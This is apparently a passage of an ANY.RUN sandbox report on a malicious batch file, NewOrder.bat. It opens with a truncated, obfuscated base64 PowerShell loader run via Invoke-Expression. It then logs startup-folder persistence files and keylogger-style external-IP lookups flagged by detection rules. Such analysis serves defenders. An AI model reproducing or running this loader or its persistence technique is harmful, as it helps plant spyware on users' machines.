amtpIHp0YyhbQ29uenRjdmVydF16dGM6OkZyb3p0Y21CYXNlenRjNjRTdHJ6dGNpbmcoJHp0Y3Z1YmJnenRjeGNramh6dGNucGVwdnp0Y1sxXSkpenRjKTt3ZmV6dGNsa2xjcHp0Y3R4amJuenRjZnggJG56dGNtc3h3Y3p0Y2xzb3dqenRjaHJ0cCB6dGMkbnVsbHp0Yzt3ZmVsenRja2xjcHR6dGN4amJuZnp0Y3ggJGljenRjdGxsb3Z6dGN3am5ubnp0Y293cSAoenRjLFtzdHJ6dGNpbmdbXXp0Y10gKCclenRjKicpKTsNCidADQoNCiRrZ3dnZCA9ICRpY3VoZyAtcmVwbGFjZSAnenRjJywgJycNCg0KSW52b2tlLUV4cHJlc3Npb24gJGtnd2dkDQo=')) | Invoke-Expression"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2800\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
52 126
Read events
52 112
Write events
14
Delete events
0

Modification events

(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2980) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
1
Text files
28
Unknown types
0

Dropped files

PID
Process
Filename
Type
1052cmd.exeC:\Users\admin\dwm.battext
MD5:5A6A70372CA061E1758F52DD37ED8ACC
SHA256:B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA
2980powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k4gmuscd.ohi.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e1f.battext
MD5:5A6A70372CA061E1758F52DD37ED8ACC
SHA256:B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA
5176powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qd2otyv2.zql.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2980powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wm5avnip.w5k.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5176powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pa33khaj.akc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8056powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5566.battext
MD5:5A6A70372CA061E1758F52DD37ED8ACC
SHA256:B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA
8056powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2plkt2q1.lih.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8056powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_01h3axeq.lra.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8088powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xkfysoei.gnw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
157
TCP/UDP connections
46
DNS requests
7
Threats
102

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1088
RUXIMICS.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1088
RUXIMICS.exe
GET
200
2.20.245.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
104.21.48.1:443
https://reallyfreegeoip.org/xml/37.182.178.175
unknown
text
344 b
malicious
2980
powershell.exe
GET
200
132.226.247.73:80
http://checkip.dyndns.org/
unknown
whitelisted
GET
200
104.21.48.1:443
https://reallyfreegeoip.org/xml/37.182.178.175
unknown
2980
powershell.exe
GET
200
132.226.247.73:80
http://checkip.dyndns.org/
unknown
whitelisted
GET
200
104.21.16.1:443
https://reallyfreegeoip.org/xml/37.182.178.175
unknown
GET
200
104.21.32.1:443
https://reallyfreegeoip.org/xml/37.182.178.175
unknown
2980
powershell.exe
GET
200
132.226.247.73:80
http://checkip.dyndns.org/
unknown
whitelisted
2980
powershell.exe
GET
200
132.226.247.73:80
http://checkip.dyndns.org/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1088
RUXIMICS.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
1088
RUXIMICS.exe
2.20.245.139:80
crl.microsoft.com
Akamai International B.V.
SE
whitelisted
1088
RUXIMICS.exe
23.219.150.101:80
www.microsoft.com
AKAMAI-AS
CL
whitelisted
2980
powershell.exe
132.226.247.73:80
checkip.dyndns.org
ORACLE-BMC-31898
BR
whitelisted
2980
powershell.exe
104.21.96.1:443
reallyfreegeoip.org
CLOUDFLARENET
malicious
5176
powershell.exe
132.226.247.73:80
checkip.dyndns.org
ORACLE-BMC-31898
BR
whitelisted
5176
powershell.exe
104.21.96.1:443
reallyfreegeoip.org
CLOUDFLARENET
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.74.206
whitelisted
crl.microsoft.com
  • 2.20.245.139
  • 2.20.245.137
whitelisted
www.microsoft.com
  • 23.219.150.101
whitelisted
checkip.dyndns.org
  • 132.226.247.73
  • 193.122.130.0
  • 193.122.6.168
  • 158.101.44.242
  • 132.226.8.169
whitelisted
reallyfreegeoip.org
  • 104.21.96.1
  • 104.21.112.1
  • 104.21.16.1
  • 104.21.80.1
  • 104.21.64.1
  • 104.21.32.1
  • 104.21.48.1
malicious
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted
self.events.data.microsoft.com
  • 20.42.72.131
whitelisted

Threats

PID
Process
Class
Message
Device Retrieving External IP Address Detected
ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected
ET INFO 404/Snake/Matiex Keylogger Style External IP Check
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
Misc activity
ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
Misc activity
ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected
ET INFO External IP Lookup - checkip.dyndns.org
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
NewOrder.bat